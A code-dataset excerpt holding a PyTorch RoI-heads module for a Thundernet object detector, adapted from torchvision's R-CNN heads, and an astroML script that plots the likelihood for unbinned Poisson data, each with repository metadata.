"communty.hivemind@gmail.com"
] | communty.hivemind@gmail.com |
2b92e1d8ee0232efdc6ea9429845fd92291d9e48 | dce6734caa0b2c60a8166a9c1020621dcaaa4079 | /src/roi_heads.py | 98e225ebacd3b5e111c7b68982162904f76e2fbe | [] | no_license | xiweiya/Thundernet-pytorch | 91be8b79edfc6da5623ea763b50f34041580171a | 0d62cd55430d5ce55560c1efc43d552b2d0b6671 | refs/heads/master | 2022-11-10T05:40:05.807907 | 2020-07-04T15:03:15 | 2020-07-04T15:03:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,303 | py | import torch
import torchvision
import torch.nn.functional as F
from torch import nn, Tensor
from torchvision.ops import boxes as box_ops
from torchvision.ops import misc as misc_nn_ops
from torchvision.ops import roi_align
#from . import _utils as det_utils
from torchvision.models.detection import _utils as det_utils
from torch.jit.annotations import Optional, List, Dict, Tuple
def fastrcnn_loss(class_logits, box_regression, labels, regression_targets):
# type: (Tensor, Tensor, List[Tensor], List[Tensor])
"""
Computes the loss for Faster R-CNN.
Arguments:
class_logits (Tensor)
box_regression (Tensor)
labels (list[BoxList])
regression_targets (Tensor)
Returns:
classification_loss (Tensor)
box_loss (Tensor)
"""
labels = torch.cat(labels, dim=0)
regression_targets = torch.cat(regression_targets, dim=0)
classification_loss = F.cross_entropy(class_logits, labels)
# get indices that correspond to the regression targets for
# the corresponding ground truth labels, to be used with
# advanced indexing
sampled_pos_inds_subset = torch.nonzero(labels > 0).squeeze(1)
labels_pos = labels[sampled_pos_inds_subset]
N, num_classes = class_logits.shape
box_regression = box_regression.reshape(N, -1, 4)
box_loss = F.smooth_l1_loss(
box_regression[sampled_pos_inds_subset, labels_pos],
regression_targets[sampled_pos_inds_subset],
reduction="sum",
)
box_loss = box_loss / labels.numel()
return classification_loss, box_loss
def maskrcnn_inference(x, labels):
# type: (Tensor, List[Tensor])
"""
From the results of the CNN, post process the masks
by taking the mask corresponding to the class with max
probability (which are of fixed size and directly output
by the CNN) and return the masks in the mask field of the BoxList.
Arguments:
x (Tensor): the mask logits
labels (list[BoxList]): bounding boxes that are used as
reference, one for ech image
Returns:
results (list[BoxList]): one BoxList for each image, containing
the extra field mask
"""
mask_prob = x.sigmoid()
# select masks coresponding to the predicted classes
num_masks = x.shape[0]
boxes_per_image = [len(l) for l in labels]
labels = torch.cat(labels)
index = torch.arange(num_masks, device=labels.device)
mask_prob = mask_prob[index, labels][:, None]
if len(boxes_per_image) == 1:
# TODO : remove when dynamic split supported in ONNX
# and remove assignment to mask_prob_list, just assign to mask_prob
mask_prob_list = [mask_prob]
else:
mask_prob_list = mask_prob.split(boxes_per_image, dim=0)
return mask_prob_list
def project_masks_on_boxes(gt_masks, boxes, matched_idxs, M):
# type: (Tensor, Tensor, Tensor, int)
"""
Given segmentation masks and the bounding boxes corresponding
to the location of the masks in the image, this function
crops and resizes the masks in the position defined by the
boxes. This prepares the masks for them to be fed to the
loss computation as the targets.
"""
matched_idxs = matched_idxs.to(boxes)
rois = torch.cat([matched_idxs[:, None], boxes], dim=1)
gt_masks = gt_masks[:, None].to(rois)
return roi_align(gt_masks, rois, (M, M), 1.)[:, 0]
def maskrcnn_loss(mask_logits, proposals, gt_masks, gt_labels, mask_matched_idxs):
# type: (Tensor, List[Tensor], List[Tensor], List[Tensor], List[Tensor])
"""
Arguments:
proposals (list[BoxList])
mask_logits (Tensor)
targets (list[BoxList])
Return:
mask_loss (Tensor): scalar tensor containing the loss
"""
discretization_size = mask_logits.shape[-1]
labels = [l[idxs] for l, idxs in zip(gt_labels, mask_matched_idxs)]
mask_targets = [
project_masks_on_boxes(m, p, i, discretization_size)
for m, p, i in zip(gt_masks, proposals, mask_matched_idxs)
]
labels = torch.cat(labels, dim=0)
mask_targets = torch.cat(mask_targets, dim=0)
# torch.mean (in binary_cross_entropy_with_logits) doesn't
# accept empty tensors, so handle it separately
if mask_targets.numel() == 0:
return mask_logits.sum() * 0
mask_loss = F.binary_cross_entropy_with_logits(
mask_logits[torch.arange(labels.shape[0], device=labels.device), labels], mask_targets
)
return mask_loss
def keypoints_to_heatmap(keypoints, rois, heatmap_size):
# type: (Tensor, Tensor, int)
offset_x = rois[:, 0]
offset_y = rois[:, 1]
scale_x = heatmap_size / (rois[:, 2] - rois[:, 0])
scale_y = heatmap_size / (rois[:, 3] - rois[:, 1])
offset_x = offset_x[:, None]
offset_y = offset_y[:, None]
scale_x = scale_x[:, None]
scale_y = scale_y[:, None]
x = keypoints[..., 0]
y = keypoints[..., 1]
x_boundary_inds = x == rois[:, 2][:, None]
y_boundary_inds = y == rois[:, 3][:, None]
x = (x - offset_x) * scale_x
x = x.floor().long()
y = (y - offset_y) * scale_y
y = y.floor().long()
x[x_boundary_inds] = torch.tensor(heatmap_size - 1)
y[y_boundary_inds] = torch.tensor(heatmap_size - 1)
valid_loc = (x >= 0) & (y >= 0) & (x < heatmap_size) & (y < heatmap_size)
vis = keypoints[..., 2] > 0
valid = (valid_loc & vis).long()
lin_ind = y * heatmap_size + x
heatmaps = lin_ind * valid
return heatmaps, valid
def _onnx_heatmaps_to_keypoints(maps, maps_i, roi_map_width, roi_map_height,
widths_i, heights_i, offset_x_i, offset_y_i):
num_keypoints = torch.scalar_tensor(maps.size(1), dtype=torch.int64)
width_correction = widths_i / roi_map_width
height_correction = heights_i / roi_map_height
roi_map = torch.nn.functional.interpolate(
maps_i[None], size=(int(roi_map_height), int(roi_map_width)), mode='bicubic', align_corners=False)[0]
w = torch.scalar_tensor(roi_map.size(2), dtype=torch.int64)
pos = roi_map.reshape(num_keypoints, -1).argmax(dim=1)
x_int = (pos % w)
y_int = ((pos - x_int) / w)
x = (torch.tensor(0.5, dtype=torch.float32) + x_int.to(dtype=torch.float32)) * \
width_correction.to(dtype=torch.float32)
y = (torch.tensor(0.5, dtype=torch.float32) + y_int.to(dtype=torch.float32)) * \
height_correction.to(dtype=torch.float32)
xy_preds_i_0 = x + offset_x_i.to(dtype=torch.float32)
xy_preds_i_1 = y + offset_y_i.to(dtype=torch.float32)
xy_preds_i_2 = torch.ones((xy_preds_i_1.shape), dtype=torch.float32)
xy_preds_i = torch.stack([xy_preds_i_0.to(dtype=torch.float32),
xy_preds_i_1.to(dtype=torch.float32),
xy_preds_i_2.to(dtype=torch.float32)], 0)
# TODO: simplify when indexing without rank will be supported by ONNX
end_scores_i = roi_map.index_select(1, y_int.to(dtype=torch.int64)) \
.index_select(2, x_int.to(dtype=torch.int64))[:num_keypoints, 0, 0]
return xy_preds_i, end_scores_i
@torch.jit.script
def _onnx_heatmaps_to_keypoints_loop(maps, rois, widths_ceil, heights_ceil,
widths, heights, offset_x, offset_y, num_keypoints):
xy_preds = torch.zeros((0, 3, int(num_keypoints)), dtype=torch.float32, device=maps.device)
end_scores = torch.zeros((0, int(num_keypoints)), dtype=torch.float32, device=maps.device)
for i in range(int(rois.size(0))):
xy_preds_i, end_scores_i = _onnx_heatmaps_to_keypoints(maps, maps[i],
widths_ceil[i], heights_ceil[i],
widths[i], heights[i],
offset_x[i], offset_y[i])
xy_preds = torch.cat((xy_preds.to(dtype=torch.float32),
xy_preds_i.unsqueeze(0).to(dtype=torch.float32)), 0)
end_scores = torch.cat((end_scores.to(dtype=torch.float32),
end_scores_i.to(dtype=torch.float32).unsqueeze(0)), 0)
return xy_preds, end_scores
def heatmaps_to_keypoints(maps, rois):
"""Extract predicted keypoint locations from heatmaps. Output has shape
(#rois, 4, #keypoints) with the 4 rows corresponding to (x, y, logit, prob)
for each keypoint.
"""
# This function converts a discrete image coordinate in a HEATMAP_SIZE x
# HEATMAP_SIZE image to a continuous keypoint coordinate. We maintain
# consistency with keypoints_to_heatmap_labels by using the conversion from
# Heckbert 1990: c = d + 0.5, where d is a discrete coordinate and c is a
# continuous coordinate.
offset_x = rois[:, 0]
offset_y = rois[:, 1]
widths = rois[:, 2] - rois[:, 0]
heights = rois[:, 3] - rois[:, 1]
widths = widths.clamp(min=1)
heights = heights.clamp(min=1)
widths_ceil = widths.ceil()
heights_ceil = heights.ceil()
num_keypoints = maps.shape[1]
if torchvision._is_tracing():
xy_preds, end_scores = _onnx_heatmaps_to_keypoints_loop(maps, rois,
widths_ceil, heights_ceil, widths, heights,
offset_x, offset_y,
torch.scalar_tensor(num_keypoints, dtype=torch.int64))
return xy_preds.permute(0, 2, 1), end_scores
xy_preds = torch.zeros((len(rois), 3, num_keypoints), dtype=torch.float32, device=maps.device)
end_scores = torch.zeros((len(rois), num_keypoints), dtype=torch.float32, device=maps.device)
for i in range(len(rois)):
roi_map_width = int(widths_ceil[i].item())
roi_map_height = int(heights_ceil[i].item())
width_correction = widths[i] / roi_map_width
height_correction = heights[i] / roi_map_height
roi_map = torch.nn.functional.interpolate(
maps[i][None], size=(roi_map_height, roi_map_width), mode='bicubic', align_corners=False)[0]
# roi_map_probs = scores_to_probs(roi_map.copy())
w = roi_map.shape[2]
pos = roi_map.reshape(num_keypoints, -1).argmax(dim=1)
x_int = pos % w
y_int = (pos - x_int) // w
# assert (roi_map_probs[k, y_int, x_int] ==
# roi_map_probs[k, :, :].max())
x = (x_int.float() + 0.5) * width_correction
y = (y_int.float() + 0.5) * height_correction
xy_preds[i, 0, :] = x + offset_x[i]
xy_preds[i, 1, :] = y + offset_y[i]
xy_preds[i, 2, :] = 1
end_scores[i, :] = roi_map[torch.arange(num_keypoints), y_int, x_int]
return xy_preds.permute(0, 2, 1), end_scores
def keypointrcnn_loss(keypoint_logits, proposals, gt_keypoints, keypoint_matched_idxs):
# type: (Tensor, List[Tensor], List[Tensor], List[Tensor])
N, K, H, W = keypoint_logits.shape
assert H == W
discretization_size = H
heatmaps = []
valid = []
for proposals_per_image, gt_kp_in_image, midx in zip(proposals, gt_keypoints, keypoint_matched_idxs):
kp = gt_kp_in_image[midx]
heatmaps_per_image, valid_per_image = keypoints_to_heatmap(
kp, proposals_per_image, discretization_size
)
heatmaps.append(heatmaps_per_image.view(-1))
valid.append(valid_per_image.view(-1))
keypoint_targets = torch.cat(heatmaps, dim=0)
valid = torch.cat(valid, dim=0).to(dtype=torch.uint8)
valid = torch.nonzero(valid).squeeze(1)
# torch.mean (in binary_cross_entropy_with_logits) does'nt
# accept empty tensors, so handle it sepaartely
if keypoint_targets.numel() == 0 or len(valid) == 0:
return keypoint_logits.sum() * 0
keypoint_logits = keypoint_logits.view(N * K, H * W)
keypoint_loss = F.cross_entropy(keypoint_logits[valid], keypoint_targets[valid])
return keypoint_loss
def keypointrcnn_inference(x, boxes):
# type: (Tensor, List[Tensor])
kp_probs = []
kp_scores = []
boxes_per_image = [box.size(0) for box in boxes]
if len(boxes_per_image) == 1:
# TODO : remove when dynamic split supported in ONNX
kp_prob, scores = heatmaps_to_keypoints(x, boxes[0])
return [kp_prob], [scores]
x2 = x.split(boxes_per_image, dim=0)
for xx, bb in zip(x2, boxes):
kp_prob, scores = heatmaps_to_keypoints(xx, bb)
kp_probs.append(kp_prob)
kp_scores.append(scores)
return kp_probs, kp_scores
def _onnx_expand_boxes(boxes, scale):
# type: (Tensor, float)
w_half = (boxes[:, 2] - boxes[:, 0]) * .5
h_half = (boxes[:, 3] - boxes[:, 1]) * .5
x_c = (boxes[:, 2] + boxes[:, 0]) * .5
y_c = (boxes[:, 3] + boxes[:, 1]) * .5
w_half = w_half.to(dtype=torch.float32) * scale
h_half = h_half.to(dtype=torch.float32) * scale
boxes_exp0 = x_c - w_half
boxes_exp1 = y_c - h_half
boxes_exp2 = x_c + w_half
boxes_exp3 = y_c + h_half
boxes_exp = torch.stack((boxes_exp0, boxes_exp1, boxes_exp2, boxes_exp3), 1)
return boxes_exp
# the next two functions should be merged inside Masker
# but are kept here for the moment while we need them
# temporarily for paste_mask_in_image
def expand_boxes(boxes, scale):
# type: (Tensor, float)
if torchvision._is_tracing():
return _onnx_expand_boxes(boxes, scale)
w_half = (boxes[:, 2] - boxes[:, 0]) * .5
h_half = (boxes[:, 3] - boxes[:, 1]) * .5
x_c = (boxes[:, 2] + boxes[:, 0]) * .5
y_c = (boxes[:, 3] + boxes[:, 1]) * .5
w_half *= scale
h_half *= scale
boxes_exp = torch.zeros_like(boxes)
boxes_exp[:, 0] = x_c - w_half
boxes_exp[:, 2] = x_c + w_half
boxes_exp[:, 1] = y_c - h_half
boxes_exp[:, 3] = y_c + h_half
return boxes_exp
@torch.jit.unused
def expand_masks_tracing_scale(M, padding):
# type: (int, int) -> float
return torch.tensor(M + 2 * padding).to(torch.float32) / torch.tensor(M).to(torch.float32)
def expand_masks(mask, padding):
# type: (Tensor, int)
M = mask.shape[-1]
if torch._C._get_tracing_state(): # could not import is_tracing(), not sure why
scale = expand_masks_tracing_scale(M, padding)
else:
scale = float(M + 2 * padding) / M
padded_mask = torch.nn.functional.pad(mask, (padding,) * 4)
return padded_mask, scale
def paste_mask_in_image(mask, box, im_h, im_w):
# type: (Tensor, Tensor, int, int)
TO_REMOVE = 1
w = int(box[2] - box[0] + TO_REMOVE)
h = int(box[3] - box[1] + TO_REMOVE)
w = max(w, 1)
h = max(h, 1)
# Set shape to [batchxCxHxW]
mask = mask.expand((1, 1, -1, -1))
# Resize mask
mask = misc_nn_ops.interpolate(mask, size=(h, w), mode='bilinear', align_corners=False)
mask = mask[0][0]
im_mask = torch.zeros((im_h, im_w), dtype=mask.dtype, device=mask.device)
x_0 = max(box[0], 0)
x_1 = min(box[2] + 1, im_w)
y_0 = max(box[1], 0)
y_1 = min(box[3] + 1, im_h)
im_mask[y_0:y_1, x_0:x_1] = mask[
(y_0 - box[1]):(y_1 - box[1]), (x_0 - box[0]):(x_1 - box[0])
]
return im_mask
def _onnx_paste_mask_in_image(mask, box, im_h, im_w):
one = torch.ones(1, dtype=torch.int64)
zero = torch.zeros(1, dtype=torch.int64)
w = (box[2] - box[0] + one)
h = (box[3] - box[1] + one)
w = torch.max(torch.cat((w, one)))
h = torch.max(torch.cat((h, one)))
# Set shape to [batchxCxHxW]
mask = mask.expand((1, 1, mask.size(0), mask.size(1)))
# Resize mask
mask = torch.nn.functional.interpolate(mask, size=(int(h), int(w)), mode='bilinear', align_corners=False)
mask = mask[0][0]
x_0 = torch.max(torch.cat((box[0].unsqueeze(0), zero)))
x_1 = torch.min(torch.cat((box[2].unsqueeze(0) + one, im_w.unsqueeze(0))))
y_0 = torch.max(torch.cat((box[1].unsqueeze(0), zero)))
y_1 = torch.min(torch.cat((box[3].unsqueeze(0) + one, im_h.unsqueeze(0))))
unpaded_im_mask = mask[(y_0 - box[1]):(y_1 - box[1]),
(x_0 - box[0]):(x_1 - box[0])]
# TODO : replace below with a dynamic padding when support is added in ONNX
# pad y
zeros_y0 = torch.zeros(y_0, unpaded_im_mask.size(1))
zeros_y1 = torch.zeros(im_h - y_1, unpaded_im_mask.size(1))
concat_0 = torch.cat((zeros_y0,
unpaded_im_mask.to(dtype=torch.float32),
zeros_y1), 0)[0:im_h, :]
# pad x
zeros_x0 = torch.zeros(concat_0.size(0), x_0)
zeros_x1 = torch.zeros(concat_0.size(0), im_w - x_1)
im_mask = torch.cat((zeros_x0,
concat_0,
zeros_x1), 1)[:, :im_w]
return im_mask
@torch.jit.script
def _onnx_paste_masks_in_image_loop(masks, boxes, im_h, im_w):
res_append = torch.zeros(0, im_h, im_w)
for i in range(masks.size(0)):
mask_res = _onnx_paste_mask_in_image(masks[i][0], boxes[i], im_h, im_w)
mask_res = mask_res.unsqueeze(0)
res_append = torch.cat((res_append, mask_res))
return res_append
def paste_masks_in_image(masks, boxes, img_shape, padding=1):
# type: (Tensor, Tensor, Tuple[int, int], int)
masks, scale = expand_masks(masks, padding=padding)
boxes = expand_boxes(boxes, scale).to(dtype=torch.int64)
im_h, im_w = img_shape
if torchvision._is_tracing():
return _onnx_paste_masks_in_image_loop(masks, boxes,
torch.scalar_tensor(im_h, dtype=torch.int64),
torch.scalar_tensor(im_w, dtype=torch.int64))[:, None]
res = [
paste_mask_in_image(m[0], b, im_h, im_w)
for m, b in zip(masks, boxes)
]
if len(res) > 0:
ret = torch.stack(res, dim=0)[:, None]
else:
ret = masks.new_empty((0, 1, im_h, im_w))
return ret
class RoIHeads(torch.nn.Module):
__annotations__ = {
'box_coder': det_utils.BoxCoder,
'proposal_matcher': det_utils.Matcher,
'fg_bg_sampler': det_utils.BalancedPositiveNegativeSampler,
}
def __init__(self,
box_roi_pool,
box_head,
box_predictor,
# Faster R-CNN training
fg_iou_thresh, bg_iou_thresh,
batch_size_per_image, positive_fraction,
bbox_reg_weights,
# Faster R-CNN inference
score_thresh,
nms_thresh,
detections_per_img,
# Mask
mask_roi_pool=None,
mask_head=None,
mask_predictor=None,
keypoint_roi_pool=None,
keypoint_head=None,
keypoint_predictor=None,
):
super(RoIHeads, self).__init__()
self.box_similarity = box_ops.box_iou
# assign ground-truth boxes for each proposal
self.proposal_matcher = det_utils.Matcher(
fg_iou_thresh,
bg_iou_thresh,
allow_low_quality_matches=False)
self.fg_bg_sampler = det_utils.BalancedPositiveNegativeSampler(
batch_size_per_image,
positive_fraction)
if bbox_reg_weights is None:
bbox_reg_weights = (10., 10., 5., 5.)
self.box_coder = det_utils.BoxCoder(bbox_reg_weights)
self.box_roi_pool = box_roi_pool
self.box_head = box_head
self.box_predictor = box_predictor
self.score_thresh = score_thresh
self.nms_thresh = nms_thresh
self.detections_per_img = detections_per_img
self.mask_roi_pool = mask_roi_pool
self.mask_head = mask_head
self.mask_predictor = mask_predictor
self.keypoint_roi_pool = keypoint_roi_pool
self.keypoint_head = keypoint_head
self.keypoint_predictor = keypoint_predictor
def has_mask(self):
if self.mask_roi_pool is None:
return False
if self.mask_head is None:
return False
if self.mask_predictor is None:
return False
return True
def has_keypoint(self):
if self.keypoint_roi_pool is None:
return False
if self.keypoint_head is None:
return False
if self.keypoint_predictor is None:
return False
return True
def assign_targets_to_proposals(self, proposals, gt_boxes, gt_labels):
# type: (List[Tensor], List[Tensor], List[Tensor])
matched_idxs = []
labels = []
for proposals_in_image, gt_boxes_in_image, gt_labels_in_image in zip(proposals, gt_boxes, gt_labels):
if gt_boxes_in_image.numel() == 0:
# Background image
device = proposals_in_image.device
clamped_matched_idxs_in_image = torch.zeros(
(proposals_in_image.shape[0],), dtype=torch.int64, device=device
)
labels_in_image = torch.zeros(
(proposals_in_image.shape[0],), dtype=torch.int64, device=device
)
else:
# set to self.box_similarity when https://github.com/pytorch/pytorch/issues/27495 lands
match_quality_matrix = box_ops.box_iou(gt_boxes_in_image, proposals_in_image)
matched_idxs_in_image = self.proposal_matcher(match_quality_matrix)
clamped_matched_idxs_in_image = matched_idxs_in_image.clamp(min=0)
labels_in_image = gt_labels_in_image[clamped_matched_idxs_in_image]
labels_in_image = labels_in_image.to(dtype=torch.int64)
# Label background (below the low threshold)
bg_inds = matched_idxs_in_image == self.proposal_matcher.BELOW_LOW_THRESHOLD
labels_in_image[bg_inds] = torch.tensor(0)
# Label ignore proposals (between low and high thresholds)
ignore_inds = matched_idxs_in_image == self.proposal_matcher.BETWEEN_THRESHOLDS
labels_in_image[ignore_inds] = torch.tensor(-1) # -1 is ignored by sampler
matched_idxs.append(clamped_matched_idxs_in_image)
labels.append(labels_in_image)
return matched_idxs, labels
def subsample(self, labels):
# type: (List[Tensor])
sampled_pos_inds, sampled_neg_inds = self.fg_bg_sampler(labels)
sampled_inds = []
for img_idx, (pos_inds_img, neg_inds_img) in enumerate(
zip(sampled_pos_inds, sampled_neg_inds)
):
img_sampled_inds = torch.nonzero(pos_inds_img | neg_inds_img).squeeze(1)
sampled_inds.append(img_sampled_inds)
return sampled_inds
def add_gt_proposals(self, proposals, gt_boxes):
# type: (List[Tensor], List[Tensor])
proposals = [
torch.cat((proposal, gt_box))
for proposal, gt_box in zip(proposals, gt_boxes)
]
return proposals
def DELTEME_all(self, the_list):
# type: (List[bool])
for i in the_list:
if not i:
return False
return True
def check_targets(self, targets):
# type: (Optional[List[Dict[str, Tensor]]])
assert targets is not None
assert self.DELTEME_all(["boxes" in t for t in targets])
assert self.DELTEME_all(["labels" in t for t in targets])
if self.has_mask():
assert self.DELTEME_all(["masks" in t for t in targets])
def select_training_samples(self, proposals, targets):
# type: (List[Tensor], Optional[List[Dict[str, Tensor]]])
self.check_targets(targets)
assert targets is not None
dtype = proposals[0].dtype
device = proposals[0].device
gt_boxes = [t["boxes"].to(dtype) for t in targets]
gt_labels = [t["labels"] for t in targets]
# append ground-truth bboxes to propos
proposals = self.add_gt_proposals(proposals, gt_boxes)
# get matching gt indices for each proposal
matched_idxs, labels = self.assign_targets_to_proposals(proposals, gt_boxes, gt_labels)
# sample a fixed proportion of positive-negative proposals
sampled_inds = self.subsample(labels)
matched_gt_boxes = []
num_images = len(proposals)
for img_id in range(num_images):
img_sampled_inds = sampled_inds[img_id]
proposals[img_id] = proposals[img_id][img_sampled_inds]
labels[img_id] = labels[img_id][img_sampled_inds].cuda()
matched_idxs[img_id] = matched_idxs[img_id][img_sampled_inds]
gt_boxes_in_image = gt_boxes[img_id]
if gt_boxes_in_image.numel() == 0:
gt_boxes_in_image = torch.zeros((1, 4), dtype=dtype, device=device)
matched_gt_boxes.append(gt_boxes_in_image[matched_idxs[img_id]])
regression_targets = self.box_coder.encode(matched_gt_boxes, proposals)
return proposals, matched_idxs, labels, regression_targets
def postprocess_detections(self, class_logits, box_regression, proposals, image_shapes):
# type: (Tensor, Tensor, List[Tensor], List[Tuple[int, int]])
device = class_logits.device
num_classes = class_logits.shape[-1]
boxes_per_image = [boxes_in_image.shape[0] for boxes_in_image in proposals]
pred_boxes = self.box_coder.decode(box_regression, proposals)
pred_scores = F.softmax(class_logits, -1)
pred_boxes_list = pred_boxes.split(boxes_per_image, 0)
pred_scores_list = pred_scores.split(boxes_per_image, 0)
all_boxes = []
all_scores = []
all_labels = []
for boxes, scores, image_shape in zip(pred_boxes_list, pred_scores_list, image_shapes):
boxes = box_ops.clip_boxes_to_image(boxes, image_shape)
# create labels for each prediction
labels = torch.arange(num_classes, device=device)
labels = labels.view(1, -1).expand_as(scores)
# remove predictions with the background label
boxes = boxes[:, 1:]
scores = scores[:, 1:]
labels = labels[:, 1:]
# batch everything, by making every class prediction be a separate instance
boxes = boxes.reshape(-1, 4)
scores = scores.reshape(-1)
labels = labels.reshape(-1)
# remove low scoring boxes
inds = torch.nonzero(scores > self.score_thresh).squeeze(1)
boxes, scores, labels = boxes[inds], scores[inds], labels[inds]
# remove empty boxes
keep = box_ops.remove_small_boxes(boxes, min_size=1e-2)
boxes, scores, labels = boxes[keep], scores[keep], labels[keep]
# non-maximum suppression, independently done per class
keep = box_ops.batched_nms(boxes, scores, labels, self.nms_thresh)
# keep only topk scoring predictions
keep = keep[:self.detections_per_img]
boxes, scores, labels = boxes[keep], scores[keep], labels[keep]
all_boxes.append(boxes)
all_scores.append(scores)
all_labels.append(labels)
return all_boxes, all_scores, all_labels
def forward(self, features, proposals, image_shapes, targets=None):
# type: (Dict[str, Tensor], List[Tensor], List[Tuple[int, int]], Optional[List[Dict[str, Tensor]]])
"""
Arguments:
features (List[Tensor])
proposals (List[Tensor[N, 4]])
image_shapes (List[Tuple[H, W]])
targets (List[Dict])
"""
#print('targets type:', type(targets))
if targets is not None:
for t in targets:
if t["labels"].dtype != torch.int64:
t["labels"] = t["labels"].type(torch.LongTensor)
# TODO: https://github.com/pytorch/pytorch/issues/26731
floating_point_types = (torch.float, torch.double, torch.half)
assert t["boxes"].dtype in floating_point_types, 'target boxes must of float type'
assert t["labels"].dtype == torch.int64, 'target labels must of int64 type'
if self.has_keypoint():
assert t["keypoints"].dtype == torch.float32, 'target keypoints must of float type'
#if self.training:
proposals, matched_idxs, labels, regression_targets = self.select_training_samples(proposals, targets)
box_features = self.box_roi_pool(features, proposals, image_shapes)
box_features = self.box_head(box_features)
class_logits, box_regression = self.box_predictor(box_features)
result = torch.jit.annotate(List[Dict[str, torch.Tensor]], [])
losses = {}
#if self.training:
assert labels is not None and regression_targets is not None
loss_classifier, loss_box_reg = fastrcnn_loss(
class_logits, box_regression, labels, regression_targets)
losses = {
"loss_classifier": loss_classifier,
"loss_box_reg": loss_box_reg
}
if self.has_mask():
mask_proposals = [p["boxes"] for p in result]
#if self.training:
assert matched_idxs is not None
# during training, only focus on positive boxes
num_images = len(proposals)
mask_proposals = []
pos_matched_idxs = []
for img_id in range(num_images):
pos = torch.nonzero(labels[img_id] > 0).squeeze(1)
mask_proposals.append(proposals[img_id][pos])
pos_matched_idxs.append(matched_idxs[img_id][pos])
if self.mask_roi_pool is not None:
mask_features = self.mask_roi_pool(features, mask_proposals, image_shapes)
mask_features = self.mask_head(mask_features)
mask_logits = self.mask_predictor(mask_features)
else:
mask_logits = torch.tensor(0)
raise Exception("Expected mask_roi_pool to be not None")
loss_mask = {}
#if self.training:
assert targets is not None
assert pos_matched_idxs is not None
assert mask_logits is not None
gt_masks = [t["masks"] for t in targets]
gt_labels = [t["labels"] for t in targets]
rcnn_loss_mask = maskrcnn_loss(
mask_logits, mask_proposals,
gt_masks, gt_labels, pos_matched_idxs)
loss_mask = {
"loss_mask": rcnn_loss_mask
}
losses.update(loss_mask)
# keep none checks in if conditional so torchscript will conditionally
# compile each branch
if self.keypoint_roi_pool is not None and self.keypoint_head is not None \
and self.keypoint_predictor is not None:
keypoint_proposals = [p["boxes"] for p in result]
#if self.training:
# during training, only focus on positive boxes
num_images = len(proposals)
keypoint_proposals = []
pos_matched_idxs = []
assert matched_idxs is not None
for img_id in range(num_images):
pos = torch.nonzero(labels[img_id] > 0).squeeze(1)
keypoint_proposals.append(proposals[img_id][pos])
pos_matched_idxs.append(matched_idxs[img_id][pos])
keypoint_features = self.keypoint_roi_pool(features, keypoint_proposals, image_shapes)
keypoint_features = self.keypoint_head(keypoint_features)
keypoint_logits = self.keypoint_predictor(keypoint_features)
loss_keypoint = {}
#if self.training:
assert targets is not None
assert pos_matched_idxs is not None
gt_keypoints = [t["keypoints"] for t in targets]
rcnn_loss_keypoint = keypointrcnn_loss(
keypoint_logits, keypoint_proposals,
gt_keypoints, pos_matched_idxs)
loss_keypoint = {
"loss_keypoint": rcnn_loss_keypoint
}
losses.update(loss_keypoint)
return result, losses | [
"820001401@qq.com"
] | 820001401@qq.com |
bf880139591dc7c773d8e6bf7be78b1c793a73ef | 364b36d699d0a6b5ddeb43ecc6f1123fde4eb051 | /_downloads_1ed/fig_poisson_continuous.py | 686b96403de5b92c73a2308049b03cfd324a149b | [] | no_license | astroML/astroml.github.com | eae3bfd93ee2f8bc8b5129e98dadf815310ee0ca | 70f96d04dfabcd5528978b69c217d3a9a8bc370b | refs/heads/master | 2022-02-27T15:31:29.560052 | 2022-02-08T21:00:35 | 2022-02-08T21:00:35 | 5,871,703 | 2 | 5 | null | 2022-02-08T21:00:36 | 2012-09-19T12:55:23 | HTML | UTF-8 | Python | false | false | 3,102 | py | """
Unbinned Poisson Data
---------------------
Figure 5.14
Regression of unbinned data. The distribution of N = 500 data points is shown
in the left panel; the true pdf is shown by the solid curve. Note that although
the data are binned in the left panel for visualization purposes, the analysis
is performed on the unbinned data. The right panel shows the likelihood for the
slope a (eq. 5.88) for three different sample sizes. The input value is
indicated by the vertical dotted line.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from astroML.stats.random import linear
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def linprob_logL(x, a, xmin, xmax):
x = x.ravel()
a = a.reshape(a.shape + (1,))
mu = 0.5 * (xmin + xmax)
W = (xmax - xmin)
return np.sum(np.log(a * (x - mu) + 1. / W), -1)
#----------------------------------------------------------------------
# Draw the data from the linear distribution
np.random.seed(0)
N = 500
a_true = 0.01
xmin = 0.0
xmax = 10.0
lin_dist = linear(xmin, xmax, a_true)
data = lin_dist.rvs(N)
x = np.linspace(xmin - 1, xmax + 1, 1000)
px = lin_dist.pdf(x)
#------------------------------------------------------------
# Plot the results
fig = plt.figure(figsize=(5, 2.5))
fig.subplots_adjust(left=0.12, right=0.95, wspace=0.28,
bottom=0.15, top=0.9)
# left panel: plot the model and a histogram of the data
ax1 = fig.add_subplot(121)
ax1.hist(data, bins=np.linspace(0, 10, 11), normed=True,
histtype='stepfilled', fc='gray', alpha=0.5)
ax1.plot(x, px, '-k')
ax1.set_xlim(-1, 11)
ax1.set_ylim(0, 0.18)
ax1.set_xlabel('$x$')
ax1.set_ylabel('$p(x)$')
# right panel: construct and plot the likelihood
ax2 = fig.add_subplot(122)
ax2.xaxis.set_major_locator(plt.MultipleLocator(0.01))
a = np.linspace(-0.01, 0.02, 1000)
Npts = (500, 100, 20)
styles = ('-k', '--b', '-.g')
for n, s in zip(Npts, styles):
logL = linprob_logL(data[:n], a, xmin, xmax)
logL = np.exp(logL - logL.max())
logL /= logL.sum() * (a[1] - a[0])
ax2.plot(a, logL, s, label=r'$\rm %i\ pts$' % n)
ax2.legend(loc=2, prop=dict(size=8))
ax2.set_xlim(-0.011, 0.02)
ax2.set_xlabel('$a$')
ax2.set_ylabel('$p(a)$')
# vertical line: in newer matplotlib versions, use ax.vlines([a_true])
ylim = ax2.get_ylim()
ax2.plot([a_true, a_true], ylim, ':k', lw=1)
ax2.set_ylim(ylim)
plt.show()
| [
"vanderplas@astro.washington.edu"
] | vanderplas@astro.washington.edu |
